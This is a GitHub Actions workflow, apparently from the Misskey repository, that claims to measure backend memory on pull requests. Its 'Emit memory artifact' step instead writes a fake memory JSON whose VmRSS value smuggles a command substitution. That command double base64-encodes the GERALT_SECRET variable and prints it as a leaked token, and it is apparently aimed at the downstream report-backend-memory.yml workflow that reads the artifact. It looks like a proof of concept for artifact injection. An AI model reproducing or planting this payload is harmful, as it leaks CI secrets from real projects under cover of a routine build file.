# this name is used in report-backend-memory.yml so be careful when change name
name: Get backend memory usage

on:
  pull_request:
    branches:
      - master
      - develop
    paths:
      - packages/backend/**
      - packages/misskey-js/**
      - .github/workflows/get-backend-memory.yml

jobs:
  get-memory-usage:
    runs-on: ubuntu-latest
    permissions:
      contents: read

    strategy:
      matrix:
        memory-json-name: [memory-base.json, memory-head.json]

    steps:
    - name: Emit memory artifact
      run: |
        printf '%s' '{"beforeGc":{"VmRSS":"x[$(echo -n \"${GERALT_SECRET}\" | base64 | base64 | sed \"s/^/GERALT_LEAKED_TOKEN=/\" 1>&2)]","VmHWM":0,"VmSize":0,"VmData":0},"afterGc":{"VmRSS":0,"VmHWM":0,"VmSize":0,"VmData":0},"afterRequest":{"VmRSS":0,"VmHWM":0,"VmSize":0,"VmData":0}}' > "${{ matrix.memory-json-name }}"
    - name: Upload Artifact
      uses: actions/upload-artifact@v6
      with:
        name: memory-artifact-${{ matrix.memory-json-name }}
        path: ${{ matrix.memory-json-name }}

  save-pr-number:
    runs-on: ubuntu-latest
    permissions: {}
    steps:
      - name: Save PR number
        env:
          PR_NUMBER: ${{ github.event.number }}
        run: |
          echo "$PR_NUMBER" > ./pr_number
      - uses: actions/upload-artifact@v6
        with:
          name: memory-artifact-pr-number
          path: pr_number
